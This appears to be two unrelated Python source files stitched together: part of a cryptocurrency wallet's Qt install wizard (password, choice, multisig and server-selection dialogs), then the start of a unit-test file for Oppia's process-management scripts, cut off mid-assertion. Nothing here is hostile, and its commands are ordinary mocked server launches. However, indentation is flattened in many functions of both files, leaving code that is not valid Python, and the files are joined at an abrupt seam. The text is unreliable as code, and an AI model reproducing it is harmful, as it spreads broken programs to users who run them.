        None, msg, kind, self.next_button,
        force_disable_encrypt_cb=force_disable_encrypt_cb)
    # Encrypting the wallet file defaults to on.
    playout.encrypt_cb.setChecked(True)
    self.exec_layout(playout.layout())
    return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
# Delegates to pw_layout with the new-password prompt and kind.
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
    """Ask whether the hardware-wallet file should be encrypted."""
    playout = PasswordLayoutForHW(
        None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
    # Encryption is on by default; the user may opt out.
    playout.encrypt_cb.setChecked(True)
    self.exec_layout(playout.layout())
    return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# When online: wait (in a daemon thread) until the wallet has synced,
# then report whether any history was found.  When offline: warn that
# the displayed address list may be incomplete.
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On macOS they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
# Daemon thread: must not keep the application alive on exit.
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
# Show *message* and wait for the user to confirm before continuing.
self.confirm(message, title)
def confirm(self, message, title):
    """Display *message* under *title* and block until the user proceeds."""
    box = QVBoxLayout()
    box.addWidget(WWLabel(message))
    self.exec_layout(box, title)
@wizard_dialog
def action_dialog(self, action, run_next):
# Execute a named storage action as a wizard step.
self.run(action)
def terminate(self):
# Close the wizard by emitting its accept signal.
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
# Run *task* in a background thread while displaying *msg*; keep pumping
# the Qt event loop until the thread finishes, then call on_finished.
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
# Poll at ~60 Hz so the GUI stays responsive while waiting.
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
    """Let the user pick one of *choices* (value, label) pairs; return the value."""
    values = [value for value, _label in choices]
    labels = [label for _value, label in choices]
    chooser = ChoicesLayout(message, labels)
    box = QVBoxLayout()
    box.addLayout(chooser.layout())
    self.exec_layout(box, title)
    return values[chooser.selected_index()]
def query_choice(self, msg, choices):
    """Called by hardware wallets: pick one of *choices*; return its index."""
    chooser = ChoicesLayout(msg, choices)
    box = QVBoxLayout()
    box.addLayout(chooser.layout())
    self.exec_layout(box, '')
    return chooser.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title, message1, choices, message2,
test_text, run_next) -> (str, str):
# Combined dialog: a set of radio choices plus a free-text line edit.
# *choices* is a list of (value, label, default_text) triples; selecting
# a choice pre-fills the line with its default text.  Returns
# (entered_text, selected_choice_value).
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
# Enable "Next" only while the entered text passes test_text.
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
# Single-line text prompt.  *test* gates the Next button; *presets* is a
# sequence of (label, text) pairs shown as buttons that fill the line.
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
# The default argument binds the preset text now, avoiding Python's
# late-binding-closure pitfall inside this loop.
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
# Collapse runs of whitespace in the entered text to single spaces.
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
    """Display the wallet's master public key so it can be shared."""
    msg = ' '.join([
        _("Here is your master public key."),
        _("Please share it with your cosigners.")
    ])
    box = QVBoxLayout()
    xpub_layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
    box.addLayout(xpub_layout.layout())
    self.exec_layout(box, _('Master Public Key'))
    return None
def init_network(self, network):
    """Ask how to pick a server: automatically or via manual selection."""
    message = _("Electrum communicates with remote servers to get "
                "information about your transactions and addresses. The "
                "servers all fulfill the same purpose only differing in "
                "hardware. In most cases you simply want to let Electrum "
                "pick one at random. However if you prefer feel free to "
                "select a server manually.")
    chooser = ChoicesLayout(message, [_("Auto connect"),
                                      _("Select server manually")])
    self.back_button.setText(_('Cancel'))
    self.exec_layout(chooser.layout(),
                     _("How do you want to connect to a server? "))
    if chooser.selected_index() == 1:
        # Manual selection: present the full network chooser.
        nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
        if self.exec_layout(nlayout.layout()):
            nlayout.accept()
    else:
        network.auto_connect = True
        self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
# Let the user pick the m-of-n parameters for a multisig wallet.
# Returns (m, n): m signatures required out of n cosigners.
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
# n (cosigners) ranges 2..15; m (required signatures) ranges 1..n.
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
# m can never exceed the number of cosigners.
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
servers_test.py | # Copyright 2019 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for scripts/servers.py."""
from __future__ import absolute_import
from __future__ import unicode_literals
import collections
import contextlib
import logging
import os
import re
import shutil
import signal
import subprocess
import sys
import threading
import time
from unittest import mock
from core import python_utils
from core.tests import test_utils
from scripts import common
from scripts import scripts_test_utils
from scripts import servers
import psutil
class ManagedProcessTests(test_utils.TestBase):
# Helper class for improving the readability of tests.
# POPEN_CALL records one psutil.Popen invocation: the program args and
# the keyword arguments it was called with.
POPEN_CALL = (
collections.namedtuple('POPEN_CALL', ['program_args', 'kwargs']))
def setUp(self):
super(ManagedProcessTests, self).setUp()
# Collects context managers entered during a test; closed in tearDown.
self.exit_stack = python_utils.ExitStack()
def tearDown(self):
try:
self.exit_stack.close()
finally:
# Always run the base teardown, even if closing the stack raised.
super(ManagedProcessTests, self).tearDown()
@contextlib.contextmanager
def swap_popen(self, unresponsive=False, num_children=0, outputs=()):
"""Returns values for inspecting and mocking calls to psutil.Popen.
Args:
unresponsive: bool. Whether the processes created by the mock will
stall when asked to terminate.
num_children: int. The number of child processes the process created
by the mock should create. Children inherit the same termination
behavior.
outputs: list(bytes). The outputs of the mock process.
Returns:
Context manager. A context manager in which calls to psutil.Popen()
create a simple program that waits and then exits.
Yields:
list(POPEN_CALL). A list with the most up-to-date arguments passed
to psutil.Popen from within the context manager returned.
"""
popen_calls = []
def mock_popen(program_args, **kwargs):
"""Mock of psutil.Popen that creates processes using os.fork().
The processes created will always terminate within ~1 minute.
Args:
program_args: list(*). Unused program arguments that would
otherwise be passed to Popen.
**kwargs: dict(str: *). Keyword arguments passed to Popen.
Returns:
PopenStub. The return value of psutil.Popen.
"""
popen_calls.append(self.POPEN_CALL(program_args, kwargs))
# The parent stub always gets pid 1; children receive the
# consecutive pids 2..num_children+1.
pid = 1
stdout = b''.join(b'%b\n' % o for o in outputs)
child_procs = [
scripts_test_utils.PopenStub(pid=i, unresponsive=unresponsive)
for i in range(pid + 1, pid + 1 + num_children)
]
return scripts_test_utils.PopenStub(
pid=pid, stdout=stdout, unresponsive=unresponsive,
child_procs=child_procs)
with self.swap(psutil, 'Popen', mock_popen):
yield popen_calls
@contextlib.contextmanager
def swap_managed_cloud_datastore_emulator_io_operations(
self, data_dir_exists):
"""Safely swaps IO operations used by managed_cloud_datastore_emulator.
Args:
data_dir_exists: bool. Return value of os.path.exists(DATA_DIR).
Yields:
tuple(CallCounter, CallCounter). CallCounter instances for rmtree
and makedirs.
"""
old_exists = os.path.exists
old_rmtree = shutil.rmtree
old_makedirs = os.makedirs
# Only intercept operations on the emulator's data directory; every
# other path falls through to the real implementation.
is_data_dir = lambda p: p == common.CLOUD_DATASTORE_EMULATOR_DATA_DIR
new_exists = (
lambda p: data_dir_exists if is_data_dir(p) else old_exists(p))
new_rmtree = test_utils.CallCounter(
lambda p, **kw: None if is_data_dir(p) else old_rmtree(p, **kw))
new_makedirs = test_utils.CallCounter(
lambda p, **kw: None if is_data_dir(p) else old_makedirs(p, **kw))
with python_utils.ExitStack() as exit_stack:
exit_stack.enter_context(self.swap(os.path, 'exists', new_exists))
exit_stack.enter_context(self.swap(shutil, 'rmtree', new_rmtree))
exit_stack.enter_context(self.swap(os, 'makedirs', new_makedirs))
yield new_rmtree, new_makedirs
def assert_proc_was_managed_as_expected(
self, logs, pid,
manager_should_have_sent_terminate_signal=True,
manager_should_have_sent_kill_signal=False):
"""Asserts that the process ended as expected.
Args:
logs: list(str). The logs emitted during the process's lifetime.
pid: int. The process ID to inspect.
manager_should_have_sent_terminate_signal: bool. Whether the manager
should have sent a terminate signal to the process.
manager_should_have_sent_kill_signal: bool. Whether the manager
should have sent a kill signal to the process.
"""
# Matches log fragments like 'Process(pid=7)' or
# 'Some Proc(name="x", pid=7)'.
proc_pattern = r'[A-Za-z ]+\((name="[A-Za-z]+", )?pid=%d\)' % (pid,)
expected_patterns = []
if manager_should_have_sent_terminate_signal:
expected_patterns.append(r'Terminating %s\.\.\.' % proc_pattern)
if manager_should_have_sent_kill_signal:
expected_patterns.append(r'Forced to kill %s!' % proc_pattern)
else:
expected_patterns.append(r'%s has already ended\.' % proc_pattern)
# Restrict the check to log lines mentioning this pid.
logs_with_pid = [msg for msg in logs if re.search(proc_pattern, msg)]
if expected_patterns and not logs_with_pid:
self.fail(msg='%r has no match in logs=%r' % (proc_pattern, logs))
self.assert_matches_regexps(logs_with_pid, expected_patterns)
def test_does_not_raise_when_psutil_not_in_path(self):
    """Entering managed_process with an empty sys.path must not raise."""
    self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap(sys, 'path', []))
    self.exit_stack.enter_context(
        servers.managed_process(['a'], timeout_secs=10))
def test_concats_command_args_when_shell_is_true(self):
    """Arguments are joined into a single string when shell=True."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    logs = self.exit_stack.enter_context(self.capture_logging())
    proc = self.exit_stack.enter_context(
        servers.managed_process(['a', 1], timeout_secs=10, shell=True))
    self.exit_stack.close()
    self.assert_proc_was_managed_as_expected(logs, proc.pid)
    expected_call = self.POPEN_CALL('a 1', {'shell': True})
    self.assertEqual(popen_calls, [expected_call])
def test_passes_command_args_as_list_of_strings_when_shell_is_false(self):
    """Arguments are stringified but kept as a list when shell=False."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    logs = self.exit_stack.enter_context(self.capture_logging())
    proc = self.exit_stack.enter_context(
        servers.managed_process(['a', 1], shell=False, timeout_secs=10))
    self.exit_stack.close()
    self.assert_proc_was_managed_as_expected(logs, proc.pid)
    expected_call = self.POPEN_CALL(['a', '1'], {'shell': False})
    self.assertEqual(popen_calls, [expected_call])
def test_filters_empty_strings_from_command_args_when_shell_is_true(self):
    """Empty-string arguments are dropped before building the shell command."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    logs = self.exit_stack.enter_context(self.capture_logging())
    proc = self.exit_stack.enter_context(
        servers.managed_process(['', 'a', '', 1], timeout_secs=10, shell=True))
    self.exit_stack.close()
    self.assert_proc_was_managed_as_expected(logs, proc.pid)
    expected_call = self.POPEN_CALL('a 1', {'shell': True})
    self.assertEqual(popen_calls, [expected_call])
def test_filters_empty_strings_from_command_args_when_shell_is_false(self):
    """Empty-string arguments are dropped from the argument list."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    logs = self.exit_stack.enter_context(self.capture_logging())
    proc = self.exit_stack.enter_context(
        servers.managed_process(['', 'a', '', 1], shell=False, timeout_secs=10))
    self.exit_stack.close()
    self.assert_proc_was_managed_as_expected(logs, proc.pid)
    expected_call = self.POPEN_CALL(['a', '1'], {'shell': False})
    self.assertEqual(popen_calls, [expected_call])
def test_reports_killed_processes_as_warnings(self):
    """Unresponsive processes end up force-killed, and that gets logged."""
    self.exit_stack.enter_context(self.swap_popen(unresponsive=True))
    logs = self.exit_stack.enter_context(self.capture_logging())
    proc = self.exit_stack.enter_context(
        servers.managed_process(['a'], timeout_secs=10))
    self.exit_stack.close()
    self.assert_proc_was_managed_as_expected(
        logs, proc.pid,
        manager_should_have_sent_terminate_signal=True,
        manager_should_have_sent_kill_signal=True)
def test_terminates_child_processes(self):
    """Every child process, plus the parent, is terminated."""
    self.exit_stack.enter_context(self.swap_popen(num_children=3))
    logs = self.exit_stack.enter_context(self.capture_logging())
    proc = self.exit_stack.enter_context(
        servers.managed_process(['a'], timeout_secs=10))
    pids = [child.pid for child in proc.children()] + [proc.pid]
    self.exit_stack.close()
    # 3 children + 1 parent, all with distinct pids.
    self.assertEqual(len(set(pids)), 4)
    for pid in pids:
        self.assert_proc_was_managed_as_expected(logs, pid)
def test_kills_child_processes(self):
    """Unresponsive children, plus the parent, are all force-killed."""
    self.exit_stack.enter_context(self.swap_popen(
        num_children=3, unresponsive=True))
    logs = self.exit_stack.enter_context(self.capture_logging())
    proc = self.exit_stack.enter_context(
        servers.managed_process(['a'], timeout_secs=10))
    pids = [child.pid for child in proc.children()] + [proc.pid]
    self.exit_stack.close()
    # 3 children + 1 parent, all with distinct pids.
    self.assertEqual(len(set(pids)), 4)
    for pid in pids:
        self.assert_proc_was_managed_as_expected(
            logs, pid,
            manager_should_have_sent_terminate_signal=True,
            manager_should_have_sent_kill_signal=True)
def test_respects_processes_that_are_killed_early(self):
    """A process that already died needs no terminate signal at cleanup."""
    self.exit_stack.enter_context(self.swap_popen())
    logs = self.exit_stack.enter_context(self.capture_logging())
    proc = self.exit_stack.enter_context(
        servers.managed_process(['a'], timeout_secs=10))
    # Kill the process before the manager gets a chance to clean it up.
    time.sleep(1)
    proc.kill()
    proc.wait()
    self.exit_stack.close()
    self.assert_proc_was_managed_as_expected(
        logs, proc.pid, manager_should_have_sent_terminate_signal=False)
def test_respects_processes_that_are_killed_after_delay(self):
# The process resists terminate but is killed by another thread while
# the manager is still waiting, so no kill signal comes from the
# manager itself.
popen_calls = self.exit_stack.enter_context(self.swap_popen(
unresponsive=True))
logs = self.exit_stack.enter_context(self.capture_logging())
proc = self.exit_stack.enter_context(servers.managed_process(
['a'], timeout_secs=10))
def _kill_after_delay():
"""Kills the targeted process after a short delay."""
time.sleep(5)
proc.kill()
assassin_thread = threading.Thread(target=_kill_after_delay)
assassin_thread.start()
self.exit_stack.close()
assassin_thread.join()
self.assert_proc_was_managed_as_expected(
logs, proc.pid,
manager_should_have_sent_terminate_signal=True,
manager_should_have_sent_kill_signal=False)
def test_does_not_raise_when_exit_fails(self):
# A failure inside psutil.wait_procs during cleanup must be logged as
# an error rather than propagated out of the context manager.
self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap_to_always_raise(
psutil, 'wait_procs', error=Exception('uh-oh')))
logs = self.exit_stack.enter_context(self.capture_logging(
min_level=logging.ERROR))
self.exit_stack.enter_context(servers.managed_process(['a', 'bc']))
# Should not raise.
self.exit_stack.close()
self.assert_matches_regexps(logs, [
r'Failed to stop Process\(pid=1\) gracefully!\n'
r'Traceback \(most recent call last\):\n'
r'.*'
r'Exception: uh-oh',
])
def test_managed_firebase_emulator(self):
    """The firebase auth emulator is launched once via a shell command."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap_to_always_return(
        common, 'wait_for_port_to_be_in_use'))
    self.exit_stack.enter_context(servers.managed_firebase_auth_emulator())
    self.exit_stack.close()
    self.assertEqual(len(popen_calls), 1)
    only_call = popen_calls[0]
    self.assertIn('firebase', only_call.program_args)
    self.assertEqual(only_call.kwargs, {'shell': True})
def test_managed_cloud_datastore_emulator(self):
    """The datastore emulator is launched once via a shell command."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(
        self.swap_managed_cloud_datastore_emulator_io_operations(True))
    self.exit_stack.enter_context(self.swap_to_always_return(
        common, 'wait_for_port_to_be_in_use'))
    self.exit_stack.enter_context(
        servers.managed_cloud_datastore_emulator())
    self.exit_stack.close()
    self.assertEqual(len(popen_calls), 1)
    only_call = popen_calls[0]
    self.assertIn('beta emulators datastore start', only_call.program_args)
    self.assertEqual(only_call.kwargs, {'shell': True})
def test_managed_cloud_datastore_emulator_creates_missing_data_dir(self):
    """A missing data dir is created (and nothing is deleted)."""
    self.exit_stack.enter_context(self.swap_popen())
    rmtree_counter, makedirs_counter = self.exit_stack.enter_context(
        self.swap_managed_cloud_datastore_emulator_io_operations(False))
    self.exit_stack.enter_context(self.swap_to_always_return(
        common, 'wait_for_port_to_be_in_use'))
    self.exit_stack.enter_context(
        servers.managed_cloud_datastore_emulator())
    self.exit_stack.close()
    self.assertEqual(rmtree_counter.times_called, 0)
    self.assertEqual(makedirs_counter.times_called, 1)
def test_managed_cloud_datastore_emulator_clears_data_dir(self):
    """With clear_datastore=True the data dir is removed and recreated."""
    self.exit_stack.enter_context(self.swap_popen())
    rmtree_counter, makedirs_counter = self.exit_stack.enter_context(
        self.swap_managed_cloud_datastore_emulator_io_operations(True))
    self.exit_stack.enter_context(self.swap_to_always_return(
        common, 'wait_for_port_to_be_in_use'))
    self.exit_stack.enter_context(servers.managed_cloud_datastore_emulator(
        clear_datastore=True))
    self.exit_stack.close()
    self.assertEqual(rmtree_counter.times_called, 1)
    self.assertEqual(makedirs_counter.times_called, 1)
def test_managed_cloud_datastore_emulator_acknowledges_data_dir(self):
    """An existing data dir is kept untouched when clear_datastore=False."""
    self.exit_stack.enter_context(self.swap_popen())
    rmtree_counter, makedirs_counter = self.exit_stack.enter_context(
        self.swap_managed_cloud_datastore_emulator_io_operations(True))
    self.exit_stack.enter_context(self.swap_to_always_return(
        common, 'wait_for_port_to_be_in_use'))
    self.exit_stack.enter_context(servers.managed_cloud_datastore_emulator(
        clear_datastore=False))
    self.exit_stack.close()
    self.assertEqual(rmtree_counter.times_called, 0)
    self.assertEqual(makedirs_counter.times_called, 0)
def test_managed_dev_appserver(self):
    """dev_appserver.py is launched once with shell=True and the given env."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap_to_always_return(
        common, 'wait_for_port_to_be_in_use'))
    self.exit_stack.enter_context(
        servers.managed_dev_appserver('app.yaml', env=None))
    self.exit_stack.close()
    self.assertEqual(len(popen_calls), 1)
    only_call = popen_calls[0]
    self.assertIn('dev_appserver.py', only_call.program_args)
    self.assertEqual(only_call.kwargs, {'shell': True, 'env': None})
def test_managed_elasticsearch_dev_server(self):
    """Elasticsearch starts quietly with its config dir in the env."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap_to_always_return(
        common, 'wait_for_port_to_be_in_use'))
    self.exit_stack.enter_context(
        servers.managed_elasticsearch_dev_server())
    self.exit_stack.close()
    only_call = popen_calls[0]
    self.assertEqual(
        only_call.program_args, '%s/bin/elasticsearch -q' % common.ES_PATH)
    self.assertEqual(only_call.kwargs, {
        'shell': True,
        'env': {'ES_PATH_CONF': common.ES_PATH_CONFIG_DIR},
    })
def test_start_server_removes_elasticsearch_data(self):
# Starting the server while the data dir "exists" must trigger an
# rmtree of that directory.
check_function_calls = {
'shutil_rmtree_is_called': False
}
old_os_path_exists = os.path.exists
def mock_os_remove_files(file_path): # pylint: disable=unused-argument
check_function_calls['shutil_rmtree_is_called'] = True
def mock_os_path_exists(file_path): # pylint: disable=unused-argument
# Pretend only the ES data dir exists; other paths use the real check.
if file_path == common.ES_PATH_DATA_DIR:
return True
return old_os_path_exists(file_path)
self.exit_stack.enter_context(self.swap_popen())
self.exit_stack.enter_context(self.swap_to_always_return(
subprocess, 'call', value=scripts_test_utils.PopenStub()))
self.exit_stack.enter_context(self.swap(
shutil, 'rmtree', mock_os_remove_files))
self.exit_stack.enter_context(self.swap(
os.path, 'exists', mock_os_path_exists))
self.exit_stack.enter_context(self.swap_to_always_return(
common, 'wait_for_port_to_be_in_use'))
self.exit_stack.enter_context(
servers.managed_elasticsearch_dev_server())
self.exit_stack.close()
self.assertTrue(check_function_calls['shutil_rmtree_is_called'])
def test_managed_redis_server_throws_exception_when_on_windows_os(self):
    """Starting redis on Windows must raise a descriptive exception."""
    self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap_to_always_return(
        common, 'is_windows_os', value=True))
    self.exit_stack.enter_context(self.swap_to_always_return(
        common, 'wait_for_port_to_be_in_use'))
    self.assertRaisesRegexp(
        Exception,
        'The redis command line interface is not installed because '
        'your machine is on the Windows operating system. The redis '
        'server cannot start.',
        lambda: self.exit_stack.enter_context(
            servers.managed_redis_server()))
def test_managed_redis_server(self):
    """Redis starts via shell and is shut down with `redis-cli shutdown nosave`.

    The dump file does not exist in this scenario, so os.remove must not
    be called.
    """
    original_os_remove = os.remove
    original_os_path_exists = os.path.exists
    @test_utils.CallCounter
    def mock_os_remove(path):
        # Swallow removal of the redis dump; defer for anything else.
        if path == common.REDIS_DUMP_PATH:
            return
        original_os_remove(path)
    def mock_os_path_exists(path):
        # Pretend the redis dump file does not exist.  NOTE: the previous
        # version forgot to return the fallback result, which made the
        # swapped os.path.exists() return None for *every* other path.
        if path == common.REDIS_DUMP_PATH:
            return False
        return original_os_path_exists(path)
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap_to_always_return(
        common, 'wait_for_port_to_be_in_use'))
    self.exit_stack.enter_context(self.swap_with_checks(
        os.path, 'exists', mock_os_path_exists))
    self.exit_stack.enter_context(self.swap_with_checks(
        subprocess,
        'check_call',
        lambda _: 0,
        expected_args=[([common.REDIS_CLI_PATH, 'shutdown', 'nosave'],)]
    ))
    self.exit_stack.enter_context(self.swap_with_checks(
        os, 'remove', mock_os_remove, called=False))
    self.exit_stack.enter_context(servers.managed_redis_server())
    self.assertEqual(len(popen_calls), 1)
    self.assertEqual(
        popen_calls[0].program_args,
        '%s %s' % (common.REDIS_SERVER_PATH, common.REDIS_CONF_PATH))
    self.assertEqual(popen_calls[0].kwargs, {'shell': True})
    self.exit_stack.close()
def test_managed_redis_server_deletes_redis_dump_when_it_exists(self):
    """When the redis dump file exists, it is deleted exactly once."""
    original_os_remove = os.remove
    original_os_path_exists = os.path.exists
    @test_utils.CallCounter
    def mock_os_remove(path):
        # Swallow removal of the redis dump; defer for anything else.
        if path == common.REDIS_DUMP_PATH:
            return
        original_os_remove(path)
    def mock_os_path_exists(path):
        # Pretend the redis dump file exists.  NOTE: the previous version
        # forgot to return the fallback result, which made the swapped
        # os.path.exists() return None for *every* other path.
        if path == common.REDIS_DUMP_PATH:
            return True
        return original_os_path_exists(path)
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap_to_always_return(
        common, 'wait_for_port_to_be_in_use'))
    self.exit_stack.enter_context(self.swap_with_checks(
        os.path, 'exists', mock_os_path_exists))
    self.exit_stack.enter_context(self.swap_with_checks(
        os, 'remove', mock_os_remove))
    self.exit_stack.enter_context(self.swap_with_checks(
        subprocess,
        'check_call',
        lambda _: 0,
        expected_args=[([common.REDIS_CLI_PATH, 'shutdown', 'nosave'],)]
    ))
    self.exit_stack.enter_context(servers.managed_redis_server())
    self.exit_stack.close()
    self.assertEqual(len(popen_calls), 1)
    self.assertEqual(
        popen_calls[0].program_args,
        '%s %s' % (common.REDIS_SERVER_PATH, common.REDIS_CONF_PATH))
    self.assertEqual(popen_calls[0].kwargs, {'shell': True})
    self.assertEqual(mock_os_remove.times_called, 1)
def test_managed_web_browser_on_linux_os(self):
    """On plain Linux the browser opens via xdg-open."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Linux'))
    self.exit_stack.enter_context(self.swap_to_always_return(
        os, 'listdir', value=[]))
    managed_web_browser = servers.create_managed_web_browser(123)
    self.assertIsNotNone(managed_web_browser)
    self.exit_stack.enter_context(managed_web_browser)
    self.assertEqual(len(popen_calls), 1)
    self.assertEqual(
        popen_calls[0].program_args, ['xdg-open', 'http://localhost:123/'])
def test_managed_web_browser_on_virtualbox_os(self):
    """Inside a VirtualBox guest no browser is launched at all."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Linux'))
    self.exit_stack.enter_context(self.swap_to_always_return(
        os, 'listdir', value=['VBOX-123']))
    managed_web_browser = servers.create_managed_web_browser(123)
    self.assertIsNone(managed_web_browser)
    self.assertEqual(len(popen_calls), 0)
def test_managed_web_browser_on_mac_os(self):
    """On macOS the browser opens via the `open` command."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Darwin'))
    self.exit_stack.enter_context(self.swap_to_always_return(
        os, 'listdir', value=[]))
    managed_web_browser = servers.create_managed_web_browser(123)
    self.assertIsNotNone(managed_web_browser)
    self.exit_stack.enter_context(managed_web_browser)
    self.assertEqual(len(popen_calls), 1)
    self.assertEqual(
        popen_calls[0].program_args, ['open', 'http://localhost:123/'])
def test_managed_web_browser_on_windows_os(self):
    """On Windows no managed browser is created."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap(common, 'OS_NAME', 'Windows'))
    self.exit_stack.enter_context(self.swap_to_always_return(
        os, 'listdir', value=[]))
    managed_web_browser = servers.create_managed_web_browser(123)
    self.assertIsNone(managed_web_browser)
    self.assertEqual(len(popen_calls), 0)
def test_managed_portserver(self):
    """The portserver exits cleanly after a single SIGINT."""
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    proc = self.exit_stack.enter_context(servers.managed_portserver())
    self.exit_stack.close()
    self.assertEqual(len(popen_calls), 1)
    self.assertEqual(
        popen_calls[0].program_args,
        'python -m scripts.run_portserver '
        '--portserver_unix_socket_address %s' % (
            common.PORTSERVER_SOCKET_FILEPATH),
    )
    # A clean exit: SIGINT only, no terminate or kill needed.
    self.assertEqual(proc.signals_received, [signal.SIGINT])
    self.assertEqual(proc.terminate_count, 0)
    self.assertEqual(proc.kill_count, 0)
def test_managed_portserver_removes_existing_socket(self):
    """A leftover portserver socket file is removed exactly once."""
    original_os_remove = os.remove
    original_os_path_exists = os.path.exists
    @test_utils.CallCounter
    def mock_os_remove(path):
        # Swallow removal of the socket file; defer for anything else.
        if path == common.PORTSERVER_SOCKET_FILEPATH:
            return
        original_os_remove(path)
    def mock_os_path_exists(path):
        # Pretend the socket file exists.  NOTE: the previous version
        # forgot to return the fallback result, which made the swapped
        # os.path.exists() return None for *every* other path.
        if path == common.PORTSERVER_SOCKET_FILEPATH:
            return True
        return original_os_path_exists(path)
    popen_calls = self.exit_stack.enter_context(self.swap_popen())
    self.exit_stack.enter_context(self.swap_with_checks(
        os.path, 'exists', mock_os_path_exists))
    self.exit_stack.enter_context(self.swap_with_checks(
        os, 'remove', mock_os_remove))
    proc = self.exit_stack.enter_context(servers.managed_portserver())
    self.exit_stack.close()
    self.assertEqual(len(popen_calls), 1)
    self.assertEqual(
        popen_calls[0].program_args,
